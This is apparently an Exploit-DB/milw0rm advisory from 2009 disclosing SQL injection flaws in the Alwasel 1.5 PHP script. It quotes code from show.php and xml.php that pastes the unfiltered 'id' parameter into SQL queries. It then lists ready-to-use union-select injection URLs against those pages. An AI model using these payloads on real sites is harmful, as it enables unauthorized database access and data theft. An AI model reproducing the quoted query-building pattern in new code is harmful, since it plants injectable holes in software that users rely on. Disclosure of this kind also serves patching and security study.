Alwasel 1.5 - Multiple SQL Injections

EDB-ID:

9384




Platform:

PHP

Date:

2009-08-07


------------------Alwasel v1.5 Multiple Remote Vulnerabilities----------------------------
   #     ####     #     ###      ##   ###  ####  ####  ###   ## ###   ####  ####   ###     #    ### ####  ######
   ##     #  #    ##     # #    # #  #  #   # #   #  #  #    #   #   #    #  # #  #  #     ##    #   # # #  #  #
   # #    #  #    # #    # #    # #  #      #     #  #   #   #   #  #        #    #        # #   #   #      #  
  #  #    ###    #  #    ###   #  #   ##    ###   ###    #  #    #  #        ###   ##      #  #  #   ###    #  
  ####    #  #   ####    #  # ######    #   #     #  #    # #    #  #        #       #     #   # #   #      #  
 #   #    #   # #   #    #  #     # #   #   #     #   #   ##     #   #    #  #   #   #     #    ##   #      #  
##    ## ###   ##    ## ####     ### ###   ####  ###   #   #    ###   ####  ####  ###   # ###    #  ####   ### 


#----------------------------------------------------------------------------------------------------------------
Script : Alwasel
version : 1.5
Language: PHP
Site: http://www.abushhab.com
Demo :http://alwasel.abushhab.com/1/
Info :http://abushhab.com/alwasel.html
Author: SwEET-DeViL
#----------------------------------------------------------------------------------------------------------------

)=> show.php
.................................................................................................................
if ( $_GET['id'] )
 {
 $qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] );  <==============={
 $nshowcinfo = @mysql_num_rows( $qshowcinfo );
//###################################################################################################
if ( $_GET['id'] )
    {
 $qshowsinfo = @mysql_query( "SELECT * FROM site where id = ".$_GET['id']." and ok != 0 and ok != 2" );  <==============={
 $nshowsinfo = @mysql_num_rows( $qshowsinfo );

.................................................................................................................
#Exploit:

http://WWW.Site.Com/alwasel/show.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--

http://WWW.Site.Com/alwasel/show.php?page=site&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16#--

-----------------------------------------------------------------------------------------------------------------

)=> xml.php
.................................................................................................................
if ( $_GET['id'] )
 {
 $qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] );  <==============={
 $nshowcinfo = @mysql_num_rows( $qshowcinfo );

.................................................................................................................
#Exploit:

http://WWW.Site.Com/alwasel/xml.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--


-----------------------------------------------------------------------------------------------------------------

#......>


/-------------www.arab4services.net-----------------\
|+------------------------------------------------+ |
||          SwEET-DeViL & viP HaCkEr              | |
||            gamr-14(at)hotmail.com              | |
|+------------------------------------------------+ |
\---------------------------------------------------/

# milw0rm.com [2009-08-07]